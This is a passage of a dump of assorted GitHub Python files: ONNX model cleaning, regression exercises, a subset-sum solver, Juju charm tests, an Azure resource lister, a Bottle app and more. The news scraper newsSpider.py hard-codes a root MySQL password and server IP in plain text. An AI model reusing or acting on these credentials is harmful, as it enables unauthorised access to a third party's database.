pyn_net.SequentialNetwork(net_id, \"X\")\n node_counter = 0\n while current_node is not None:\n\n if isinstance(current_node, pyn_nodes.FullyConnectedNode):\n clean_node = copy.deepcopy(current_node)\n clean_node.identifier = f\"FC_{node_counter}\"\n clean_net.add_node(clean_node)\n node_counter += 1\n elif isinstance(current_node, pyn_nodes.ReLUNode):\n clean_node = copy.deepcopy(current_node)\n clean_node.identifier = f\"ReLU_{node_counter}\"\n clean_net.add_node(clean_node)\n node_counter += 1\n\n else:\n pass\n\n current_node = temp_net.get_next_node(current_node)\n\n onnx.save(pyn_conv.ONNXConverter().from_neural_network(clean_net).onnx_network, clean_dir + clean_net.identifier +\n \".onnx\")\n\n\n","repo_name":"NeVerTools/pyNeVer","sub_path":"examples/submissions/IEEEAccess2023/vnncomp_benchmarks/model_cleaning.py","file_name":"model_cleaning.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"38175391385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 16 17:41:31 2018\n\n@author: Samantha\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import stats\n\n\nx = np.arange(0.001,10,0.01)\ny = np.log(x)\n\ninicio = 1.02\nancho_intervalo=0.5\nint1, int2 = inicio, inicio+ancho_intervalo\nancho = 0.01\nc1, c2 = np.mean([int1, int2])-ancho, np.mean([int1, int2])+ancho\n\n\nx2 = np.arange(int1,int2,0.001)\ny2 = np.log(x2)\n\nx3 = np.arange(c1, c2, 0.001)\ny3 = np.log(x3)\n\n#x2 = x3\n#y2 = y3\n\nm, b = np.polyfit(x3,y3,1)\n\ndef recta(t):\n return m*t+b\n \nr = recta(x) \nr2 = recta(x2)\n\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(x,y, 'b-', label= '$\\log(x)$')\nax.plot(x,r, 'r-', label = 'Aprox. 
lineal')\nax.plot(x2, y2, 'k')\nax.plot(x2, r2, 'k')\n#plt.plot(x, r, 'r')\n# logarithm curve interval markers\nax.vlines(x=int1, ymin=np.log(0.01),ymax=np.log(int1),colors='k', linestyles='dashed')\nax.vlines(x=int2, ymin=np.log(0.01),ymax=np.log(int2),colors='k', linestyles='dashed')\nax.hlines(y=np.log(int1), xmin=0,xmax=int1,colors='b', linestyles='dashed')\nax.hlines(y=np.log(int2), xmin=0,xmax=int2,colors='b', linestyles='dashed')\nax.vlines(x=0.011, ymin=np.log(int1), ymax=np.log(int2), colors='g', linestyles='solid')\n# linear fit interval markers\nax.vlines(x=int1, ymin=np.log(0.01),ymax=recta(int1),colors='k', linestyles='dashed')\nax.vlines(x=int2, ymin=np.log(0.01),ymax=recta(int2),colors='k', linestyles='dashed')\nax.hlines(y=recta(int1), xmin=0,xmax=int1,colors='r', linestyles='dashed')\nax.hlines(y=recta(int2), xmin=0,xmax=int2,colors='r', linestyles='dashed')\nax.vlines(x=0.011, ymin=recta(int1), ymax=recta(int2), colors='g', linestyles='solid')\nax.legend(loc=1, borderaxespad=0.3)\nax.set_xlabel('x')\nax.set_ylabel('y')\n#ax.set_xlim(xmin=0.01, xmax=0.5)\n#ax.set_ylim(ymin=np.log(0.01), ymax=0)\nax.grid()\n\n#plt.savefig('F:/Facultad/Estadística/loglineal.png', dpi=None, facecolor='w', edgecolor='w', orientation='portrait', papertype=None, format=None, transparent=False, bbox_inches='tight', pad_inches=0.1, frameon=None)\n\n#%%\ndef lineal(t,pendiente, ordenada):\n    return pendiente*t+ordenada\n\nies = np.arange(0.01,1.5,0.01)\nfor i in ies:\n    ancho_intervalo = 0.5\n    int1_f, int2_f = i, i+ancho_intervalo\n    ancho_f = 0.01\n    c1_f, c2_f = np.mean([int1_f, int2_f])-ancho_f, np.mean([int1_f, int2_f])+ancho_f\n    x3_f = np.arange(c1_f, c2_f, 0.001)\n    y3_f = np.log(x3_f)\n\n    m_f, b_f = np.polyfit(x3_f,y3_f,1)\n    intervalo_log = np.log(int2_f)- np.log(int1_f)\n    intervalo_recta = lineal(int2_f, m_f, b_f)- lineal(int1_f, m_f, b_f)\n    if intervalo_recta>intervalo_log:\n        print(round(i,2), 'intervalo_recta>intervalo_log')\n    elif intervalo_recta<intervalo_log:\n        print(round(i,2), 'intervalo_log>intervalo_recta')\n","repo_name":"samanthakucher/Dataciones_con_C14","sub_path":"grafico_log_aprox_lineal.py","file_name":"grafico_log_aprox_lineal.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"70046674355","text":"\r\nimport collections\r\n\r\n\r\ndef canPartitionKSubsets(nums, k):\r\n    if not nums or not k or 0 != sum(nums)%k:\r\n        return False\r\n\r\n    def dfs(nums, n, k, start, used, part, inc):\r\n        if k == 1:\r\n            return True\r\n        if inc > part:\r\n            return False\r\n        if inc == part:\r\n            inc = 0\r\n            k -= 1\r\n            start = 0\r\n\r\n        for i in range(start, n):\r\n            if used[i] == True:\r\n                continue\r\n            used[i] = True\r\n            if dfs(nums, n, k, i+1, used, part, inc + nums[i]):\r\n                return True\r\n            used[i] = False\r\n        return False\r\n\r\n    used = [False]*len(nums)\r\n    return dfs(nums, len(nums), k, 0, used, sum(nums)//k, 0)\r\n\r\n\r\ntc = int(input())\r\nfor t in range(tc):\r\n    n = int(input())\r\n    nums = list(map(int, input().split()))\r\n    if 0 == sum(nums)%2 and True == canPartitionKSubsets(nums, 2):\r\n        print('YES')\r\n    else:\r\n        print('NO')\r\n","repo_name":"roiei/algo","sub_path":"Geeksforgeeks/12. Subset Sum Problem in O(sum) space.py","file_name":"12. 
Subset Sum Problem in O(sum) space.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"29573282553","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('inventoryKMA', '0005_auto_20150512_1416'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='unititem',\n            name='field',\n            field=models.CharField(default=2, validators=[django.core.validators.MinLengthValidator(0)], max_length=15),\n            preserve_default=False,\n        ),\n    ]\n","repo_name":"valysenko/python","sub_path":"envs/inventory/dev/inventory/inventoryKMA/migrations/0006_unititem_field.py","file_name":"0006_unititem_field.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"6965492222","text":"#!/usr/bin/python3\n\"\"\" append_after module \"\"\"\n\n\ndef append_after(filename=\"\", search_string=\"\", new_string=\"\"):\n    \"\"\"\n    Function to add string after a specific string\n    Args:\n        search_string: string to identify\n        new_string: string to add\n    \"\"\"\n    new = \"\"\n\n    with open(filename, 'r') as file:\n        for line in file:\n            new += line\n            if search_string in line:\n                new += new_string\n\n    with open(filename, 'w') as file:\n        file.write(new)\n","repo_name":"kenkomu/higher_level_programming","sub_path":"0x0B-python-input_output/100-append_after.py","file_name":"100-append_after.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"11540394114","text":"from numpy import *\nimport matplotlib.pyplot as plt\n\ndef loadDataSet(filename):\n    numFeat = len(open(filename).readline().split('\\t')) - 1\n    dataMat = []\n    labbelMat = []\n    fr = open(filename)\n    for line in fr.readlines():\n        lineArr = []\n        currLine = line.strip().split('\\t')\n        for i in range(numFeat):\n            lineArr.append(float(currLine[i]))\n        dataMat.append(lineArr)\n        labbelMat.append(float(currLine[-1]))\n    return dataMat, labbelMat\n\ndef standRegres(xArr, yArr):\n    xMat = mat(xArr)\n    yMat = mat(yArr).T\n    xTx = xMat.T * xMat\n    # linalg.det() computes the determinant of a matrix\n    # if the determinant is 0, the matrix is not invertible and the next computation cannot proceed\n    if linalg.det(xTx) == 0.0:\n        print('this matrix can not do inverse')\n        return\n    ws = xTx.I * (xMat.T * yMat)\n    return ws\n\ndef test():\n    xArr, yArr = loadDataSet('../AiLearning/data/8.Regression/data.txt')\n    ws = standRegres(xArr, yArr)\n    xMat = mat(xArr)\n    yMat = mat(yArr)\n    print(ws)\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    ax.scatter(xMat[:, 1].flatten().A[0], yMat.T[:, 0].flatten().A[0])\n    xCopy = xMat.copy()\n    xCopy.sort(0)\n    yHat = xCopy * ws\n    print('correlation')\n    print(corrcoef(yHat.T, yMat))\n    ax.plot(xCopy[:, 1], yHat)\n    plt.show()\n\ndef lwlr(testPoint, xArr, yArr, k=1.0):\n    xMat = mat(xArr)\n    yMat = mat(yArr).T\n    m = shape(xMat)[0]\n    weights = mat(eye((m)))\n\n    for j in range(m):\n        diffMat = testPoint - xMat[j, :]\n        weights[j, j] = exp(diffMat * diffMat.T / (-2 * k ** 2))\n    xTx = xMat.T * (weights * xMat)\n    if linalg.det(xTx) == 0.0:\n        print('this matrix can not do inverse')\n        return\n    ws = xTx.I * (xMat.T * (weights * yMat))\n    return testPoint * ws\n\ndef lwlrTest(testArr, xArr, yArr, k=1.0):\n    m = shape(testArr)[0]\n    yHat = zeros(m)\n    for i in range(m):\n        yHat[i] = lwlr(testArr[i], xArr, yArr, k)\n    return 
yHat\n\ndef test2():\n    xArr, yArr = loadDataSet('../AiLearning/data/8.Regression/data.txt')\n    yHat = lwlrTest(xArr, xArr, yArr, 0.03)\n    xMat = mat(xArr)\n    strInd = xMat[:, 1].argsort(0)\n    xSort = xMat[strInd][:, 0, :]\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    ax.plot(xSort[:, 1], yHat[strInd])\n    ax.scatter(xMat[:,1].flatten().A[0], mat(yArr).T.flatten().A[0] , s=2, c='red')\n    plt.show()\n\ndef rssError(yArr, yHatArr):\n    return ((yArr - yHatArr) ** 2).sum()\n\ndef abaloneTest():\n    abX, abY = loadDataSet('../AiLearning/data/8.Regression/abalone.txt')\n    oldyHat01 = lwlrTest(abX[0: 99], abX[0: 99], abY[0: 99], 0.1)\n    oldyHat1 = lwlrTest(abX[0: 99], abX[0: 99], abY[0: 99], 1)\n    oldyHat10 = lwlrTest(abX[0: 99], abX[0: 99], abY[0: 99], 10)\n\n    print('oldyHat01 error size is:', rssError(abY[0: 99], oldyHat01.T))\n    print('oldyHat01 error size is:', rssError(abY[0: 99], oldyHat1.T))\n    print('oldyHat01 error size is:', rssError(abY[0: 99], oldyHat10.T))\n\n    newyHat01 = lwlrTest(abX[100:199], abX[0:99], abY[0:99], 0.1)\n    newyHat1 = lwlrTest(abX[100:199], abX[0:99], abY[0:99], 1)\n    newyHat10 = lwlrTest(abX[100:199], abX[0:99], abY[0:99], 10)\n    print('new yHat01 error Size is :' , rssError(abY[0:99], newyHat01.T))\n    print('new yHat1 error Size is :' , rssError(abY[0:99], newyHat1.T))\n    print('new yHat10 error Size is :' , rssError(abY[0:99], newyHat10.T))\n\n    standSw = standRegres(abX[0: 99], abY[0: 99])\n    standSwHat = mat(abX[100: 199]) * standSw\n    print('standRegress error Size is:', rssError(abY[100: 199], standSwHat.T.A))\n\ndef rdigeRegres(xMat, yMat, lam=0.2):\n    xTx = xMat.T * xMat\n    denom = xTx + eye(shape(xMat)[1]) * lam\n\n    if linalg.det(denom) == 0.0:\n        print('this matrix can not do inverse')\n        return\n    ws = denom.I * (xMat.T * yMat)\n    return ws\n\ndef rdigeRegresTest(xArr, yArr):\n    xMat = mat(xArr)\n    yMat = mat(yArr).T\n    yMean = mean(yMat, 0)\n    yMat = yMat - yMean\n    xMeans = mean(xMat, 0)\n    xVar = var(xMat, 0)\n    xMat = (xMat - xMeans) / xVar\n    numTestPts = 30\n    wMat = zeros((numTestPts, shape(xMat)[1]))\n    for i in range(numTestPts):\n        ws = rdigeRegres(xMat, yMat, exp(i - 10))\n        wMat[i, :] = ws.T\n    return wMat\n\ndef test3():\n    abX,abY = loadDataSet('../AiLearning/data/8.Regression/abalone.txt')\n    ridgeWeights = rdigeRegresTest(abX, abY)\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    ax.plot(ridgeWeights)\n    plt.show()\n\ndef regularize(xMat):  # normalize by column\n    inMat = xMat.copy()\n    inMeans = mean(inMat, 0)  # compute the mean, then subtract it\n    inVar = var(inMat, 0)  # compute the variance of Xi to divide by\n    inMat = (inMat - inMeans) / inVar\n    return inMat\n\ndef stageWise(xArr, yArr, eps=0.01, numIt=100):\n    xMat = mat(xArr)\n    yMat = mat(yArr).T\n    yMean = mean(yMat, 0)\n    yMat = yMat - yMean\n    xMat = regularize(xMat)\n    m, n = shape(xMat)\n    ws = zeros((n, 1))\n    wsTest = ws.copy()\n    wsMax = ws.copy()\n    returnMat = zeros((numIt, n))\n\n    for i in range(numIt):\n        print(ws.T)\n        lowestError = inf\n        for j in range(n):\n            for sign in [-1, 1]:\n                wsTest = ws.copy()\n                wsTest[j] += eps * sign\n                yTest = xMat * wsTest\n                rssE = rssError(yMat.A, yTest.A)\n                if rssE < lowestError:\n                    lowestError = rssE\n                    wsMax = wsTest\n        ws = wsMax.copy()\n        returnMat[i, :] = ws.T\n    return returnMat\n\ndef test4():\n    xArr, yArr = loadDataSet('../AiLearning/data/8.Regression/abalone.txt')\n    print(stageWise(xArr, yArr, 0.01, 200))\n    xMat = mat(xArr)\n    yMat = mat(yArr).T\n    xMat = regularize(xMat)\n    yM = mean(yMat,0)\n    yMat = yMat - yM\n    weights = standRegres(xMat, yMat.T)\n    print(weights.T)\n\ntest4()","repo_name":"eng-cc/learn","sub_path":"ml/ML in 
action/8/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12346735154","text":"import os\r\nimport uuid\r\n\r\nimport pymysql\r\nimport requests\r\n\r\n# request The Paper (Pengpai) site and get the response\r\nimport time\r\n\r\nimport sys\r\nfrom bs4 import BeautifulSoup\r\n\r\n# set the news source label\r\nnewsSource = \"来自澎湃新闻\"\r\n# set the domain-name prefix\r\npreUrl = \"http://dubidubi.iask.in/repoter\"\r\n# connect to the database\r\nconn = pymysql.connect(host='119.29.28.81', port=3306, user='root', passwd='Linzijie123!!', db='gzh', charset='utf8')\r\n# get a database cursor\r\ncursor = conn.cursor()\r\nnewsurl = \"http://www.thepaper.cn/\"\r\n# get the current time as a string\r\ntodaystr = time.strftime(\"%Y-%m-%d\", time.localtime())\r\ncurrentTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\r\nresp = requests.get(newsurl)\r\n# set the response encoding\r\nresp.encoding = \"utf-8\"\r\n# get the response HTML and parse it\r\nhtml5 = resp.text\r\nh5soup = BeautifulSoup(html5, \"html.parser\")\r\n# select the relevant elements via CSS\r\ndivs = h5soup.select(\"div.news_li\")\r\nfor div in divs:\r\n    ataglist = div.select(\"div.news_tu > a\")\r\n    if not ataglist:\r\n        break\r\n    # get the news title\r\n    title = div.select(\"h2 > a\")\r\n    # get the news content\r\n    news_content = div.select(\"p\")\r\n    # get the news link\r\n    ahref = \"http://www.thepaper.cn/\" + ataglist[0].get(\"href\")\r\n    # get the news image\r\n    imglist = ataglist[0].select(\"img\")\r\n    imghref = \"http:\" + imglist[0].get(\"src\")\r\n    # fetch the image from the image server and store it\r\n    img_resp = requests.get(imghref)\r\n    if img_resp.status_code == 200:\r\n        # path of the new folder\r\n        path = sys.argv[1] + todaystr\r\n        if not os.path.exists(path):\r\n            os.mkdir(path)\r\n        # save the image at the specified file path\r\n        finpath = path + \"/\" + imghref[10:20] + str(uuid.uuid1())[0:15] + \".jpg\"\r\n        open(finpath, \"wb\").write(img_resp.content)\r\n        img_url = finpath.find(\"/news\")\r\n        cursor.execute('insert news_info(title,create_time,img_url,original_web_url,source,source_id) values(%s,%s,%s,%s,%s,%s)',\r\n                       (title[0].text, currentTime, preUrl + finpath[img_url:], ahref, newsSource, 100))\r\nconn.commit()\r\ncursor.close()\r\nconn.close()\r\n","repo_name":"lzzzz4/dubidubi","sub_path":"src/main/resources/py/newsSpider.py","file_name":"newsSpider.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"}
+{"seq_id":"12787569505","text":"\r\n# Importing the used modules\r\nimport gc\r\n# The lists of the students names for both classes\r\nPythonStudents = [\"Abdoh\", \"Erick\", \"Stive\", \"Moe\", \"Susan\", \"Sarah\",\"Helen\", \"Harry\", \"Mark\", \"Josh\", \"Shon\"]\r\nWebAppStudents = [\"Aaron\", \"Moe\", \"Maria\", \"Josh\", \"Erick\", \"A\", \"Susan\", \"Mark\", \"Jim\", \"Brendan\", \"Shon\", \"Paul\", \"Barry\", \"Julia\"]\r\nprint(\"\")\r\n# printing the students names who are found in both classes, by iterating in both of the names lists\r\nprint('Students who are in both classes : ')\r\nfor PythonStudent in PythonStudents:\r\n    for WebAppStudent in WebAppStudents:\r\n        # The condition where a student is found in both classes\r\n        if PythonStudent == WebAppStudent:\r\n            print(PythonStudent)\r\n\r\nprint(\"\")\r\nprint('=========================')\r\nprint(\"\")\r\nprint('Students who are not common in both the classes : ')\r\n# Initializing the detection indicator value\r\nIndicator=0\r\nfor PythonStudent in PythonStudents:\r\n    for WebAppStudent in WebAppStudents:\r\n        if PythonStudent == WebAppStudent:\r\n            # If each name in the first students group has a match in the second students group \r\n            # then 
we set the indicator to 1 to not include this name in the not common list of names \r\n Indicator=1\r\n # If a match discovered (indicator=1) then we will not print this name \r\n # and we will reset the indicator back to its original value (0) to compare \r\n # the next name from the fist group with all the names of the second group\r\n if Indicator==1:\r\n Indicator=0\r\n # If no match found then this student is not common in both classes, so we print his/her name\r\n elif Indicator==0:\r\n print(PythonStudent)\r\n\r\nprint(\"\")\r\nprint('Exiting ...')\r\n# Freeing up the used resources\r\ndel PythonStudents \r\ndel WebAppStudents\r\ngc.collect()\r\nprint('End of the program, Thanks !')","repo_name":"mannsmoe/DeepLearningSpring2018","sub_path":"Lab1/Lab1Req4.py","file_name":"Lab1Req4.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28956008186","text":"import io\nimport json\nimport unittest\n\nfrom unittest.mock import MagicMock, ANY\n\nfrom charm import OpenApiaryCharm\nfrom ops.model import ActiveStatus\nfrom ops.testing import Harness\n\n\n# Partial test fixture only\nNODE_VERSION_INFO = \"\"\"\n{\n \"name\": \"open-apiary\",\n \"version\": \"1.1.1\",\n \"description\": \"Apiary management software\",\n \"author\": \"Simon Emms\",\n \"private\": true,\n \"license\": \"MIT\",\n \"main\": \"./server/main\"\n}\n\"\"\"\n\nCOMPLETE_MYSQL_DATA_BAG = {\n \"database\": \"testdatabase\",\n \"host\": \"mysql-db-server\",\n \"port\": 3306,\n \"user\": \"testuser\",\n \"password\": \"foobar\",\n}\n\nINCOMPLETE_MYSQL_DATA_BAG = {\n \"database\": \"testdatabase\",\n}\n\n\nclass TestCharm(unittest.TestCase):\n def setUp(self):\n self.harness = Harness(OpenApiaryCharm)\n self.addCleanup(self.harness.cleanup)\n self.harness.begin()\n # NOTE(jamespage)\n # Mock out push and pull as not implemented in test harness\n container = self.harness.model.unit.get_container(\"open-apiary\")\n container.push = MagicMock()\n container.pull = MagicMock()\n # Use of a lambda here just makes sure everytime the pull method is\n # executed a new StringIO reader is created.\n container.pull.side_effect = lambda *args: io.StringIO(NODE_VERSION_INFO)\n self.addCleanup(container.push)\n self.addCleanup(container.pull)\n self.maxDiff = None\n\n def _test_config_changed(\n self, weather_token: str = None, debug: bool = False\n ) -> None:\n \"\"\"Base config_changed test handler\"\"\"\n # Expected plan with default config\n expected_plan = {\n \"services\": {\n \"open-apiary\": {\n \"override\": \"replace\",\n \"summary\": \"open-apiary\",\n \"command\": \"/usr/local/bin/npm start\",\n \"startup\": \"enabled\",\n \"environment\": {\n \"PORT\": \"3000\",\n \"DATA_PATH\": \"/data\",\n \"UPLOAD_PATH\": \"/uploads\",\n \"LOG_DESTINATION\": \"/data/open-apiary.log\",\n \"LOG_LEVEL\": \"debug\" if debug else \"info\",\n \"WEATHER_API_KEY\": weather_token or \"\",\n \"CONFIG_CHECKSUM\": ANY,\n },\n }\n }\n }\n\n # Get the open-apiary container from the model\n container = self.harness.model.unit.get_container(\"open-apiary\")\n self.harness.update_config(\n {\n \"weather-api-token\": weather_token,\n \"debug\": debug,\n }\n )\n # Everything happens on config-changed so just emit this event\n # Get the plan now we've run PebbleReady\n updated_plan = self.harness.get_container_pebble_plan(\"open-apiary\").to_dict()\n # Check we've got the plan we expected\n self.assertEqual(expected_plan, updated_plan)\n # Check configuration 
file pushed to container\n container.push.assert_called_once_with(\n \"/opt/app/config.json\",\n json.dumps(\n self.harness.charm._open_apiary_config(),\n sort_keys=True,\n indent=2,\n ),\n make_dirs=True,\n )\n\n # Check the service was started\n service = container.get_service(\"open-apiary\")\n self.assertTrue(service.is_running())\n # Ensure we set an ActiveStatus with no message\n self.assertEqual(self.harness.model.unit.status, ActiveStatus())\n self.assertEqual(self.harness.get_workload_version(), \"1.1.1\")\n\n def test_config_changed(self):\n \"\"\"config changed with default options\"\"\"\n self._test_config_changed()\n\n def test_config_changed_weather_token_set(self):\n \"\"\"config changed with token and debug logging\"\"\"\n self._test_config_changed(weather_token=\"mytoken\", debug=True)\n\n def test_mysql_relation(self):\n \"\"\"mysql-database relation test\"\"\"\n relation_id = self.harness.add_relation(\"mysql-database\", \"mysql\")\n self.harness.add_relation_unit(relation_id, \"mysql/0\")\n\n # Check incomplete data handling - should use sqlite\n self.harness.update_relation_data(\n relation_id, \"mysql/0\", INCOMPLETE_MYSQL_DATA_BAG\n )\n expected_oa_config = {\n \"db\": {\"database\": \"/data/db.sql\", \"type\": \"sqlite\"},\n \"jwt\": {\"secret\": ANY},\n }\n self.assertEqual(expected_oa_config, self.harness.charm._open_apiary_config())\n\n # Check complete data handling - should use mysql\n self.harness.update_relation_data(\n relation_id, \"mysql/0\", COMPLETE_MYSQL_DATA_BAG\n )\n expected_oa_config = {\n \"db\": {\n \"database\": \"testdatabase\",\n \"host\": \"mysql-db-server\",\n \"password\": \"foobar\",\n \"port\": 3306,\n \"type\": \"mysql\",\n \"username\": \"testuser\",\n },\n \"jwt\": {\"secret\": ANY},\n }\n self.assertEqual(expected_oa_config, self.harness.charm._open_apiary_config())\n\n # TODO(jamespage)\n # write relation removal tests once Harness supports this\n # https://github.com/canonical/operator/pull/460\n","repo_name":"javacruft/charm-open-apiary","sub_path":"tests/test_charm.py","file_name":"test_charm.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74882164913","text":"'''\nQuestion : 1.5 One way\n\ndescription : Given two strings, write a function to check \n if they are one edit ( or zero edits ) away.\n\nexample :\n\n pale , ple ---> true\n pales, pale ---> true\n pale , bale ---> true\n pale , bake ---> false\n\n'''\n\ndef is_one_char_dif( s1, s2 ):\n # s1 and s2 must be of the same size\n num_edits = 0\n for i in range( 0, len( s1 ) ):\n if s1[ i ] != s2[ i ]:\n num_edits += 1\n\n return num_edits <= 1\n\ndef is_missing_one_char( small, big ):\n num_edits = 0\n i_small = 0\n i_big = 0\n while num_edits <=1 and i_small < len( small ) :\n if small[ i_small ] != big[ i_big ]:\n num_edits += 1\n i_big += 1\n else:\n i_small += 1\n i_big += 1\n\n return num_edits <= 1\n\n\ndef one_way( s1, s2 ):\n size_dif = abs( len( s1 ) - len( s2 ) )\n if size_dif > 1:\n return False\n \n small = s1\n big = s2\n if len( s2 ) < len( s1 ):\n small = s2\n big = s1\n \n if size_dif == 1:\n return is_missing_one_char( small, big )\n else:\n return is_one_char_dif( small, big )\n\nif __name__ == '__main__':\n #s1, s2 = 'pale' , 'ple' # True\n #s1, s2 = 'pales', 'pale' # True\n #s1, s2 = 'pale' , 'bale' # True\n #s1, s2 = 'pale' , 'bake' # False\n s1, s2 = 'acd', 'abcd' # True\n\n\n print( '\"{}\" \\t \"{}\"'.format( s1, s2 ) )\n if one_way( s1, s2 ):\n 
print( 'YES, they are one way ... or another' )\n else:\n print( 'NO, they are not one way' )","repo_name":"canislatranscoxus/interview","sub_path":"cracking/chapter_01/1_5/p1_5_01.py","file_name":"p1_5_01.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3727786856","text":"import logging\nimport json\nimport os\n\nfrom azure.mgmt.resource import ResourceManagementClient\n\n\ndef process_rg_instance(group):\n \"\"\"\n Get the relevant pieces of information from a ResourceGroup instance.\n \"\"\"\n return {\n \"Name\": group.name,\n \"Id\": group.id,\n \"Location\": group.location,\n \"Tags\": group.tags,\n \"Properties\": group.properties.provisioning_state \\\n if group.properties and group.properties.provisioning_state else None\n }\n\n\nasync def list_rgs(credentials, subscription_id):\n \"\"\"\n Get list of resource groups for the subscription id passed.\n \"\"\"\n list_of_resource_groups = []\n\n with ResourceManagementClient(credentials, subscription_id) as rg_client:\n try:\n for i in rg_client.resource_groups.list():\n list_of_resource_groups.append(process_rg_instance(i))\n \n except Exception as e:\n logging.error(\"encountered: {0}\".format(str(e)))\n\n return json.dumps(list_of_resource_groups)\n","repo_name":"Azure-Samples/azure-functions-python-list-resource-groups","sub_path":"src/get-list-of-azure-resource-groups-functionapp/GetListOfResourceGroups/resource_group_operations.py","file_name":"resource_group_operations.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"1787712964","text":"# -*- coding: utf-8 -*-\nfrom yield_data import *\n\ndef cleaner(data_type, yielder_type):\n\tin_dir_path, out_dir_path = \"./data/train/raw/\" + data_type + \"/\", \"./data/train/clean/\" + data_type + \"/\"\n\tyielder = yielder_type(in_dir_path)\n\tif not os.path.exists(out_dir_path):\n\t\tos.mkdir(out_dir_path)\n\tfor file_path, new_line_list in yielder:\n\t\tfile = codecs.open(out_dir_path + file_path, \"w\")\n\t\tfor line in new_line_list:\n\t\t\tfile.write(line.encode(\"utf-8\") + \"\\n\")\t\n\nif __name__ == \"__main__\":\n\tfor data_type, yielder_type in type_dict.iteritems():\n\t\tcleaner(data_type, yielder_type)\n","repo_name":"john820911/AI_contest","sub_path":"clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3849587270","text":"from bottle import Bottle, route, run\nfrom bottle import request, response\nfrom bottle import post, get, put, delete\nfrom json import dumps, loads\nfrom datetime import datetime\nfrom bin import benz_main\n\napp = Bottle()\n\nversion = 0\nquestioni = \"\"\nknowledgei = 0\nlab_view = \"0\"\nfakeq = 0 \nimg_url = \"\"\n#tags = [\"string\"]\nsolutioni = \"\"\n\n@app.hook('after_request')\ndef enable_cors():\n \"\"\"\n You need to add some headers to each request.\n Don't use the wildcard '*' for Access-Control-Allow-Origin in production.\n \"\"\"\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\ndef increment_version():\n global version\n if version < 5:\n version = version + 1\n global img_url\n 
img_url = benz_main.fnget_imgurls(version)\n    \n@app.route('/hello')\ndef hello():\n    #return \"Hello World!\"\n    q = benz_main.fnget_question(2)\n    return q\n\n@app.route('/knowledge')\ndef new_knowledge():\n    global knowledgei\n    global questioni\n    global solutioni\n    print(knowledgei)\n    print(solutioni)\n    print(questioni)\n    #return {\"version\": \"v\", \"question\":\"How to fix the fuel system injector? \",\"answer\":\" Cap off the cylinders in the following sequence - 1, 3, 2 and 4. After capping off each cylinder, crank the engine and see if the crank time reduces to 3 to 5 seconds. If it does, you have found your leaking cylinder.If not,proceed to the next cylinder\",\"tags\":[\"DD13\",\"fuel injector\"]}\n    return {\"version\": knowledgei, \"question\": questioni, \"answer\": solutioni ,\"tags\":[\"dd13\",\"fuel\"]}\n@app.route('/solution')\ndef question():\n    # value = request.body.read()\n    #v = loads(value)\n    prob = request.query.problem\n    global version \n    version = 2\n    return {\"problem\" : \"you are the problem\", \"solution\": \"what can i do about that\", \"id\": 1}\n\n\n@app.route('/reset')\ndef change():\n    new_version = request.query.version\n    global version\n    global img_url\n    version = int(new_version)\n    if version == 0:\n        img_url = \"\"\n    global knowledgei\n    knowledgei = int(new_version)\n    global lab_view\n    lab_view = new_version\n    global questioni\n    questioni = \"\"\n    global solutioni\n    solutioni = \"\"\n\n@app.route('/change_lab')\ndef change_lab():\n    new_version = request.query.version\n    global lab_view\n    lab_view = new_version\n\n@app.route('/fake')\ndef fake():\n    increment_version()\n    global version\n    #if lab_view == \"0\" :\n    #    lab_view = \"1\"\n    #elif lab_view == \"1\":\n    #    lab_view = \"0\"\n    return str(version)\n\n@app.route('/solution', method='POST')\ndef solution_new():\n    #write to db \n    try:\n        value = request.body.read()\n        print(value)\n        if value is not None:\n            v = loads(value)\n            print(v)\n        #except:\n        #    print(\"error in solution post\")\n        #query = dumps(v)\n        # benz_main.fnwrite_solution(1,v[\"solution\"])\n        global knowledgei\n        knowledgei = 1\n        global questioni\n        questioni = v[\"problem\"]\n        global solutioni\n        solutioni = v[\"solution\"]\n    except:\n        print(value)\n    # solution, keywords = 